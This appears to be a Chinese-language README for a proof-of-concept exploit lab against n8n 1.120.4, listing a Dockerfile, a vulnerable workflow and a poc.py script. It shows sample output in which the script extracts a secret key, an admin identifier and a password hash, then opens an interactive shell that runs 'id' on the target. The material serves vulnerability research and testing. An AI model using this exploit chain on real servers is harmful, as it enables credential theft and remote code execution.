
针对 n8n 1.120.4 的 PoC 环境,包含一个表单触发器工作流和一个利用脚本。
Dockerfile — 构建 n8n 漏洞环境run.bat — 运行容器(Windows)workflow.txt — n8n 工作流(包含表单触发器)poc.py — PoC 脚本requirements.txt — PoC 依赖docker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY、管理员标识符)。n8n-shell>)。id)会返回目标环境的输出(RCE)。[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
我们每月发布一次 CVE 和恶意软件分析。如果您感兴趣,请点击下方链接查看我们的出版物。